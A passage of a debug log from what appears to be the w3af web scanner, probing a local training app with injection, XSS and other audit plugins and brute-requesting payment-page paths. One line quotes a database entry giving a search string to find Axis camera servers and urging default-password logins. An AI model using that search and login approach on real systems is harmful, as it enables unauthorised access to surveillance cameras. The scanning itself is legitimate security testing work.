(id=932,from_cache=0,grep=1,rtt=0.06,did=xhtkmeb2) [Wed Feb 12 09:37:34 2020 - debug] POST http://localhost:9090/servlet/validatepayment.cgi returned HTTP code "404" (id=936,from_cache=0,grep=1,rtt=0.29,did=O97CU4KL) [Wed Feb 12 09:37:34 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 107. [Wed Feb 12 09:37:34 2020 - debug] websocket_hijacking.audit(did="nz9lZWs3", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:34 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:34 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:r6sv1VXD) [Wed Feb 12 09:37:34 2020 - debug] POST http://localhost:9090/modules/trxcomplete.cgi returned HTTP code "404" (id=935,from_cache=0,grep=1,rtt=0.12,did=KPTvMxDh) [Wed Feb 12 09:37:34 2020 - debug] shell_shock.audit(did="p4D19NCw", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:34 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:sOsv8VLX) [Wed Feb 12 09:37:34 2020 - debug] blind_sqli.audit(did="qoCQsbrc",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.49s to run [Wed Feb 12 09:37:34 2020 - debug] memcachei.audit(did="WSMKWrtB", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:34 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:34 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:WSMKWrtB) [Wed Feb 12 09:37:34 2020 - debug] POST http://localhost:9090/module/validate.php5 returned HTTP code "404" (id=938,from_cache=0,grep=1,rtt=0.39,did=dtUGtAAs) [Wed Feb 12 09:37:34 2020 - debug] POST http://localhost:9090/includes/completepayment.php5 returned HTTP code "404" (id=940,from_cache=0,grep=1,rtt=0.50,did=YjcF6LAb) [Wed Feb 12 09:37:34 2020 - debug] POST http://localhost:9090/includes/transactioncomplete.cgi returned HTTP code "404" (id=947,from_cache=0,grep=1,rtt=0.09,did=v8tcOqmg) [Wed Feb 12 09:37:34 2020 - debug] POST http://localhost:9090/modules/paymentcomplete.php5 returned HTTP code "404" (id=948,from_cache=0,grep=1,rtt=0.56,did=hD6Re34l) [Wed Feb 12 09:37:34 2020 - debug] sqli.audit(did="d85rLqWq",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.76s to run [Wed Feb 12 09:37:34 2020 - debug] Updating socket timeout for localhost from 3.20 to 3.00 seconds [Wed Feb 12 09:37:35 2020 - debug] POST http://localhost:9090/inc/transactioncomplete.php5 returned HTTP code "404" (id=945,from_cache=0,grep=1,rtt=0.26,did=ACv2Q7Yb) [Wed Feb 12 09:37:35 2020 - debug] POST http://localhost:9090/modules/complete.cgi returned HTTP code "404" (id=937,from_cache=0,grep=1,rtt=0.21,did=7tycKlvH) [Wed Feb 12 09:37:35 2020 - debug] POST http://localhost:9090/inc/valid.cgi returned HTTP code "404" (id=941,from_cache=0,grep=1,rtt=0.40,did=fms5o8xI) [Wed Feb 12 09:37:35 2020 - debug] GET http://localhost:9090/includes/pay.php5 returned HTTP code "404" (id=951,from_cache=0,grep=1,rtt=0.16,did=3DyvFauW) [Wed Feb 12 09:37:35 2020 - debug] Finished audit.phishing_vector (did=r6sv1VXD) [Wed Feb 12 09:37:35 2020 - debug] phishing_vector.audit(did="r6sv1VXD",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.34s to run [Wed Feb 12 09:37:35 2020 - debug] POST http://localhost:9090/module/final.php5 returned HTTP code "404" (id=946,from_cache=0,grep=1,rtt=0.53,did=iYAzgWJo) [Wed Feb 12 09:37:35 2020 - debug] POST http://localhost:9090/includes/paid.cgi returned HTTP code "404" (id=944,from_cache=0,grep=1,rtt=0.12,did=PHVmoZua) [Wed Feb 12 09:37:35 2020 - debug] POST http://localhost:9090/servlet/return.php5 returned HTTP code "404" (id=939,from_cache=0,grep=1,rtt=0.14,did=1BipdhGL) [Wed Feb 12 09:37:35 2020 - debug] POST http://localhost:9090/modules/finished.php5 returned HTTP code "404" (id=942,from_cache=0,grep=1,rtt=0.57,did=lKJPRK3T) [Wed Feb 12 09:37:35 2020 - debug] POST http://localhost:9090/inc/return.cgi returned HTTP code "404" (id=950,from_cache=0,grep=1,rtt=0.29,did=FnP4cGc8) [Wed Feb 12 09:37:35 2020 - debug] format_string.audit(did="sOsv8VLX",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.29s to run [Wed Feb 12 09:37:35 2020 - debug] POST http://localhost:9090/inc/success.cgi returned HTTP code "404" (id=943,from_cache=0,grep=1,rtt=0.12,did=psIIba8B) [Wed Feb 12 09:37:35 2020 - debug] memcachei.audit(did="WSMKWrtB",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.15s to run [Wed Feb 12 09:37:35 2020 - debug] un_ssl.audit(did="rl6AcVeu", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:35 2020 - debug] un_ssl.audit(did="rl6AcVeu",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.00s to run [Wed Feb 12 09:37:35 2020 - debug] GET http://localhost:9090/module/successful.cgi returned HTTP code "404" (id=952,from_cache=0,grep=1,rtt=0.03,did=suQtXlz7) [Wed Feb 12 09:37:36 2020 - debug] websocket_hijacking.audit(did="nz9lZWs3",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.30s to run [Wed Feb 12 09:37:36 2020 - debug] POST http://localhost:9090/inc/validpay.php5 returned HTTP code "404" (id=949,from_cache=0,grep=1,rtt=0.30,did=86HOX2dj) [Wed Feb 12 09:37:36 2020 - debug] ldapi.audit(did="y1T7o7lF", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:36 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:36 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:y1T7o7lF) [Wed Feb 12 09:37:36 2020 - debug] buffer_overflow.audit(did="BQ70mqVQ", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:36 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:36 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 108. [Wed Feb 12 09:37:36 2020 - debug] ldapi.audit(did="y1T7o7lF",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.11s to run [Wed Feb 12 09:37:36 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 109. [Wed Feb 12 09:37:36 2020 - debug] redos.audit(did="gKd3pXny", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:36 2020 - debug] buffer_overflow.audit(did="BQ70mqVQ",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.15s to run [Wed Feb 12 09:37:36 2020 - debug] GET http://localhost:9090/servlet/finished.cgi returned HTTP code "404" (id=953,from_cache=0,grep=1,rtt=0.17,did=22EQq0Wv) [Wed Feb 12 09:37:36 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 110. [Wed Feb 12 09:37:36 2020 - debug] global_redirect.audit(did="Q70SyQOL", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:36 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:36 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:Q70SyQOL) [Wed Feb 12 09:37:36 2020 - debug] xpath.audit(did="fQQuB4bH", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:36 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:36 2020 - debug] htaccess_methods.audit(did="bs0HYETQ", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:36 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:36 2020 - debug] localhost:9090 connection pool stats (free:47 / in_use:6 / max:50 / total:53) [Wed Feb 12 09:37:36 2020 - debug] Connections with more in use time: (f5adb0c09c70ca09, 0.35 sec) (955b76b517b2a7f0, 0.32 sec) (084f56a9dda1c119, 0.21 sec) (a5419411797e137e, 0.20 sec) (ff9acc2bc4ba5606, 0.15 sec) [Wed Feb 12 09:37:36 2020 - debug] GET http://localhost:9090/servlet/valid.php5 returned HTTP code "404" (id=954,from_cache=0,grep=1,rtt=0.05,did=3k6fDpUX) [Wed Feb 12 09:37:36 2020 - debug] GET http://localhost:9090/modules/paymentcomplete.php5 returned HTTP code "404" (id=957,from_cache=0,grep=1,rtt=0.07,did=TE14jYqo) [Wed Feb 12 09:37:36 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 111. [Wed Feb 12 09:37:36 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:fQQuB4bH) [Wed Feb 12 09:37:36 2020 - debug] xpath.audit(did="fQQuB4bH",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.19s to run [Wed Feb 12 09:37:36 2020 - debug] cors_origin.audit(did="Lkxgff2R", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:36 2020 - debug] dav.audit(did="8S5nvBM0", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:36 2020 - debug] dav.audit(did="8S5nvBM0",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.00s to run [Wed Feb 12 09:37:36 2020 - debug] redos.audit(did="gKd3pXny",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.44s to run [Wed Feb 12 09:37:36 2020 - debug] GET http://localhost:9090/servlet/validatepayment.cgi returned HTTP code "404" (id=955,from_cache=0,grep=1,rtt=0.19,did=Uh4UmmLY) [Wed Feb 12 09:37:36 2020 - debug] POST http://localhost:9090/includes/pay.php returned HTTP code "404" (id=956,from_cache=0,grep=1,rtt=0.21,did=Xp95ljZW) [Wed Feb 12 09:37:36 2020 - debug] GET http://localhost:9090/inc/transactioncomplete.php5 returned HTTP code "404" (id=959,from_cache=0,grep=1,rtt=0.10,did=6tDzxNw3) [Wed Feb 12 09:37:36 2020 - debug] ssi.audit(did="eyuAyGDh", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:36 2020 - debug] GET http://localhost:9090/modules/finished.php5 returned HTTP code "404" (id=958,from_cache=0,grep=1,rtt=0.25,did=vNNDaajo) [Wed Feb 12 09:37:36 2020 - debug] There is a corrupt signature in the GHDB. No query string was found in the following XML code: "791https://www.exploit-db.com/ghdb/791/Various Online Devicessome of the sites are very, very interesting - try a search substituting site:gov instead of site:com, or try site:edu or site:org or site:fm. Anyway, camera servers made by Axis Video, you can look up administrator manuals online via the following search string (guess what you might find there?):site:com inurl:axis video server manualsCan you say default UID and PW?What\'s really interesting is if you look hard enough; you can find cameras within government and educational labs; airport surveillance; even some stretches of I65 in the US (for those of you close to the Ohio River area).Anyway this search string gets you into the server; from there you can have many controls or few controls over the cameras (including zoom, pan, and iris). There is much to see and most of the cameras have easy acccess to admin profile via click of a button - of course from there you have to provide a UID & PW. But read up on the manuals any you may get lucky.Bottom line, if you can control the camera (via admin priv.) you can control what and when the camera & server view as well as what & when they record. Just a small seed for a possibly big idea - your ambitions may vary.Rate it! Give me feedback! I will not learn without some form of criticism...yet despite how insignificant that criticism may make me feel...i enjoy the search for the unseen/unknown knowledge nonetheless...it was worth it.". [Wed Feb 12 09:37:36 2020 - debug] GET http://localhost:9090/includes/completepayment.php5 returned HTTP code "404" (id=964,from_cache=0,grep=1,rtt=0.12,did=SiEjt6nW) [Wed Feb 12 09:37:37 2020 - debug] GET http://localhost:9090/module/validate.php5 returned HTTP code "404" (id=961,from_cache=0,grep=1,rtt=0.14,did=DAJxLkib) [Wed Feb 12 09:37:37 2020 - debug] GET http://localhost:9090/module/paymentsuccess.cgi returned HTTP code "404" (id=963,from_cache=0,grep=1,rtt=0.23,did=KFqS69Qn) [Wed Feb 12 09:37:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 112. [Wed Feb 12 09:37:37 2020 - debug] GET http://localhost:9090/includes/payment.php5 returned HTTP code "404" (id=966,from_cache=0,grep=1,rtt=0.02,did=EJw4l5Li) [Wed Feb 12 09:37:37 2020 - debug] POST http://localhost:9090/module/successful.asp returned HTTP code "404" (id=967,from_cache=0,grep=1,rtt=0.49,did=h1hX6mEW) [Wed Feb 12 09:37:37 2020 - debug] xxe.audit(did="cXFfHygr", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:37 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:38 2020 - debug] GET http://localhost:9090/modules/complete.cgi returned HTTP code "404" (id=972,from_cache=0,grep=1,rtt=0.27,did=hwADI9ig) [Wed Feb 12 09:37:38 2020 - debug] rosetta_flash.audit(did="lQPmM3z0", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:38 2020 - debug] GET http://localhost:9090/learn/vulnerability/a8_ides returned HTTP code "200" (id=960,from_cache=0,grep=1,rtt=0.24,did=p4D19NCw) [Wed Feb 12 09:37:38 2020 - debug] eval.audit(did="yV3ph6t2", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:38 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:38 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:yV3ph6t2) [Wed Feb 12 09:37:38 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:38 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 09:37:38 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: cLPQL0Tb) [Wed Feb 12 09:37:38 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=271 returned HTTP code "200" (id=962,from_cache=0,grep=0,rtt=0.88,did=ttWY97tK) [Wed Feb 12 09:37:38 2020 - debug] POST http://localhost:9090/servlet/finished.asp returned HTTP code "404" (id=968,from_cache=0,grep=1,rtt=0.30,did=A6aLo8hi) [Wed Feb 12 09:37:38 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 113. [Wed Feb 12 09:37:38 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 114. [Wed Feb 12 09:37:38 2020 - debug] GET http://localhost:9090/servlet/success.php5 returned HTTP code "404" (id=969,from_cache=0,grep=1,rtt=0.06,did=z0mRew2Z) [Wed Feb 12 09:37:38 2020 - debug] GET http://localhost:9090/inc/return.cgi returned HTTP code "404" (id=974,from_cache=0,grep=1,rtt=0.17,did=ms4raqHU) [Wed Feb 12 09:37:38 2020 - debug] GET http://localhost:9090/includes/paid.cgi returned HTTP code "404" (id=975,from_cache=0,grep=1,rtt=0.24,did=jda0ZY0R) [Wed Feb 12 09:37:38 2020 - debug] eval.audit(did="yV3ph6t2",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.00s to run [Wed Feb 12 09:37:38 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 440, 'reject-seen-url': 197, 'reject-out-of-scope': 11, 'accept': 152} [Wed Feb 12 09:37:38 2020 - debug] rosetta_flash.audit(did="lQPmM3z0",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.00s to run [Wed Feb 12 09:37:38 2020 - debug] xss.audit(did="0pW9Tnu6", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:38 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 440, 'reject-seen-url': 197, 'reject-out-of-scope': 11, 'accept': 152} [Wed Feb 12 09:37:38 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 440, 'reject-seen-url': 197, 'reject-out-of-scope': 11, 'accept': 152} [Wed Feb 12 09:37:38 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:39 2020 - debug] GET http://localhost:9090/module/final.php5 returned HTTP code "404" (id=971,from_cache=0,grep=1,rtt=0.48,did=rJsZzxef) [Wed Feb 12 09:37:39 2020 - debug] GET http://localhost:9090/servlet/return.php5 returned HTTP code "404" (id=973,from_cache=0,grep=1,rtt=0.30,did=qUkUrN0c) [Wed Feb 12 09:37:39 2020 - debug] GET http://localhost:9090/module/paymentsuccessful.cgi returned HTTP code "404" (id=970,from_cache=0,grep=1,rtt=0.36,did=9cdfKP3F) [Wed Feb 12 09:37:39 2020 - debug] GET http://localhost:9090/includes/transactioncomplete.cgi returned HTTP code "404" (id=980,from_cache=0,grep=1,rtt=0.28,did=ClKtLkrU) [Wed Feb 12 09:37:40 2020 - debug] GET http://localhost:9090/inc/success.cgi returned HTTP code "404" (id=976,from_cache=0,grep=1,rtt=0.18,did=TD7Vh83F) [Wed Feb 12 09:37:40 2020 - debug] GET http://localhost:9090/modules/validatepayment.php5 returned HTTP code "404" (id=977,from_cache=0,grep=1,rtt=0.16,did=pZayelWs) [Wed Feb 12 09:37:40 2020 - debug] GET http://localhost:9090/modules/trxcomplete.cgi returned HTTP code "404" (id=965,from_cache=0,grep=1,rtt=0.06,did=9VfaUUxI) [Wed Feb 12 09:37:40 2020 - debug] GET http://localhost:9090/modules/validation.php5 returned HTTP code "404" (id=979,from_cache=0,grep=1,rtt=0.45,did=fXQ9ibiU) [Wed Feb 12 09:37:41 2020 - debug] POST http://localhost:9090/servlet/valid.php returned HTTP code "404" (id=981,from_cache=0,grep=1,rtt=0.21,did=uKUXohGH) [Wed Feb 12 09:37:41 2020 - debug] GET http://localhost:9090/servlet/validation.cgi returned HTTP code "404" (id=978,from_cache=0,grep=1,rtt=0.42,did=pumDAOwM) [Wed Feb 12 09:37:41 2020 - debug] xxe.audit(did="cXFfHygr",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.17s to run [Wed Feb 12 09:37:41 2020 - debug] ssl_certificate.audit(did="cOvq89L4", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:41 2020 - debug] xss.audit(did="0pW9Tnu6",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.11s to run [Wed Feb 12 09:37:41 2020 - debug] localhost:9090 connection pool stats (free:50 / in_use:3 / max:50 / total:53) [Wed Feb 12 09:37:41 2020 - debug] Connections with more in use time: (955b76b517b2a7f0, 0.38 sec) (20c6fb7a85d275d0, 0.10 sec) (084f56a9dda1c119, 0.03 sec) (a5419411797e137e, 0.02 sec) [Wed Feb 12 09:37:41 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 115. [Wed Feb 12 09:37:41 2020 - debug] xst.audit(did="DATBFMNE", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:41 2020 - debug] xst.audit(did="DATBFMNE",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.00s to run [Wed Feb 12 09:37:41 2020 - debug] ssl_certificate.audit(did="cOvq89L4",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.01s to run [Wed Feb 12 09:37:41 2020 - debug] GET http://localhost:9090/learn/vulnerability/a8_ides returned HTTP code "200" (id=982,from_cache=0,grep=1,rtt=0.19,did=Lkxgff2R) [Wed Feb 12 09:37:41 2020 - debug] GET http://localhost:9090/includes/validpay.cgi returned HTTP code "404" (id=990,from_cache=0,grep=1,rtt=0.47,did=Oe8bN7Pz) [Wed Feb 12 09:37:41 2020 - debug] global_redirect.audit(did="Q70SyQOL",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 1.54s to run [Wed Feb 12 09:37:41 2020 - debug] POST http://localhost:9090/inc/transactioncomplete.php returned HTTP code "404" (id=984,from_cache=0,grep=1,rtt=0.25,did=SKLtd6xW) [Wed Feb 12 09:37:41 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 116. [Wed Feb 12 09:37:41 2020 - debug] POST http://localhost:9090/module/paymentsuccess.asp returned HTTP code "404" (id=987,from_cache=0,grep=1,rtt=0.17,did=3eFoHO33) [Wed Feb 12 09:37:42 2020 - debug] GET http://localhost:9090/inc/validpay.php5 returned HTTP code "404" (id=983,from_cache=0,grep=1,rtt=0.16,did=5cj5E8Qp) [Wed Feb 12 09:37:42 2020 - debug] POST http://localhost:9090/servlet/validatepayment.asp returned HTTP code "404" (id=992,from_cache=0,grep=1,rtt=0.34,did=RRgwhma7) [Wed Feb 12 09:37:42 2020 - debug] preg_replace.audit(did="xGtnweJI", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:42 2020 - debug] POST http://localhost:9090/modules/paymentcomplete.php returned HTTP code "404" (id=988,from_cache=0,grep=1,rtt=0.45,did=ciHO1oNv) [Wed Feb 12 09:37:42 2020 - debug] GET http://localhost:9090/learn/vulnerability/a8_ides returned HTTP code "200" (id=985,from_cache=0,grep=1,rtt=0.19,did=PzgSTNzM) [Wed Feb 12 09:37:42 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 117. [Wed Feb 12 09:37:42 2020 - debug] POST http://localhost:9090/includes/completepayment.php returned HTTP code "404" (id=986,from_cache=0,grep=1,rtt=0.17,did=zyMWObPI) [Wed Feb 12 09:37:42 2020 - debug] POST http://localhost:9090/includes/payment.php returned HTTP code "404" (id=989,from_cache=0,grep=1,rtt=0.10,did=coY7FFpr) [Wed Feb 12 09:37:42 2020 - debug] POST http://localhost:9090/modules/finished.php returned HTTP code "404" (id=991,from_cache=0,grep=1,rtt=0.33,did=BdzPvRNd) [Wed Feb 12 09:37:42 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:42 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:eyuAyGDh) [Wed Feb 12 09:37:42 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:xGtnweJI) [Wed Feb 12 09:37:43 2020 - debug] GET http://localhost:9090/module/completepay.php5 returned HTTP code "404" (id=994,from_cache=0,grep=1,rtt=0.17,did=05qg7uFP) [Wed Feb 12 09:37:43 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 118. [Wed Feb 12 09:37:43 2020 - debug] mx_injection.audit(did="ddnFvqZN", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:43 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:43 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:ddnFvqZN) [Wed Feb 12 09:37:43 2020 - debug] htaccess_methods.audit(did="bs0HYETQ",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 1.87s to run [Wed Feb 12 09:37:43 2020 - debug] ssi.audit(did="eyuAyGDh",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 1.30s to run [Wed Feb 12 09:37:43 2020 - debug] GET http://localhost:9090/inc/paid.php5 returned HTTP code "404" (id=996,from_cache=0,grep=1,rtt=0.28,did=6QsZDRok) [Wed Feb 12 09:37:43 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=993,from_cache=0,grep=0,rtt=0.17,did=cLPQL0Tb) [Wed Feb 12 09:37:43 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 442, 'reject-seen-url': 214, 'reject-out-of-scope': 11, 'accept': 158} [Wed Feb 12 09:37:43 2020 - debug] GET http://localhost:9090/inc/valid.cgi returned HTTP code "404" (id=1001,from_cache=0,grep=1,rtt=0.20,did=j2iG468k) [Wed Feb 12 09:37:43 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: cLPQL0Tb) [Wed Feb 12 09:37:43 2020 - debug] detailed._login() took 1.34s to run [Wed Feb 12 09:37:43 2020 - debug] preg_replace.audit(did="xGtnweJI",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.40s to run [Wed Feb 12 09:37:43 2020 - debug] Using RLIMIT_AS memory usage limit 2350 MB for new pool process [Wed Feb 12 09:37:43 2020 - debug] response_splitting.audit(did="FMaPyDIZ", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:43 2020 - debug] POST http://localhost:9090/modules/validation.php returned HTTP code "404" (id=1003,from_cache=0,grep=1,rtt=0.35,did=C9yCP5Oh) [Wed Feb 12 09:37:43 2020 - debug] POST http://localhost:9090/includes/validpay.asp returned HTTP code "404" (id=1004,from_cache=0,grep=1,rtt=0.13,did=QBFtzwSi) [Wed Feb 12 09:37:43 2020 - debug] POST http://localhost:9090/modules/validatepayment.php returned HTTP code "404" (id=1005,from_cache=0,grep=1,rtt=0.06,did=KQFrsqvl) [Wed Feb 12 09:37:43 2020 - debug] POST http://localhost:9090/module/validate.php returned HTTP code "404" (id=999,from_cache=0,grep=1,rtt=0.56,did=kEI1vW9H) [Wed Feb 12 09:37:43 2020 - debug] POST http://localhost:9090/modules/complete.asp returned HTTP code "404" (id=997,from_cache=0,grep=1,rtt=0.33,did=UEMH0UVn) [Wed Feb 12 09:37:43 2020 - debug] rfd.audit(did="YHgVHPCW", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:43 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 119. [Wed Feb 12 09:37:43 2020 - debug] POST http://localhost:9090/modules/trxcomplete.asp returned HTTP code "404" (id=995,from_cache=0,grep=1,rtt=0.13,did=5qYVYSs9) [Wed Feb 12 09:37:43 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:43 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:FMaPyDIZ) [Wed Feb 12 09:37:43 2020 - debug] URL "http://localhost:9090/learn/vulnerability/a8_ides" is not vulnerable to RFD because response content-type is "text/html" and content-disposition header is missing, response id 894 [Wed Feb 12 09:37:44 2020 - debug] POST http://localhost:9090/module/paymentsuccessful.asp returned HTTP code "404" (id=1008,from_cache=0,grep=1,rtt=0.36,did=tVaNNvwu) [Wed Feb 12 09:37:44 2020 - debug] POST http://localhost:9090/includes/paid.asp returned HTTP code "404" (id=1010,from_cache=0,grep=1,rtt=0.60,did=HueuAwnE) [Wed Feb 12 09:37:44 2020 - debug] POST http://localhost:9090/servlet/validation.asp returned HTTP code "404" (id=1002,from_cache=0,grep=1,rtt=0.46,did=uaRFQ0WN) [Wed Feb 12 09:37:44 2020 - debug] mx_injection.audit(did="ddnFvqZN",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.39s to run [Wed Feb 12 09:37:44 2020 - debug] rfi.audit(did="8j0N7I1h", uri="http://localhost:9090/learn/vulnerability/a8_ides") [Wed Feb 12 09:37:44 2020 - debug] rfd.audit(did="YHgVHPCW",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.07s to run [Wed Feb 12 09:37:44 2020 - debug] POST http://localhost:9090/servlet/return.php returned HTTP code "404" (id=1000,from_cache=0,grep=1,rtt=0.22,did=eBlpJoeY) [Wed Feb 12 09:37:44 2020 - debug] response_splitting.audit(did="FMaPyDIZ",uri="http://localhost:9090/learn/vulnerability/a8_ides") took 0.22s to run [Wed Feb 12 09:37:44 2020 - debug] localhost:9090 connection pool stats (free:50 / in_use:3 / max:50 / total:53) [Wed Feb 12 09:37:44 2020 - debug] Connections with more in use time: (a5419411797e137e, 0.18 sec) (ff9acc2bc4ba5606, 0.16 sec) (084f56a9dda1c119, 0.08 sec) (20c6fb7a85d275d0, 0.02 sec) [Wed Feb 12 09:37:44 2020 - debug] GET http://localhost:9090/modules/validatepay.cgi returned HTTP code "404" (id=998,from_cache=0,grep=1,rtt=0.38,did=Pqrhpc9k) [Wed Feb 12 09:37:44 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" () [Wed Feb 12 09:37:44 2020 - debug] 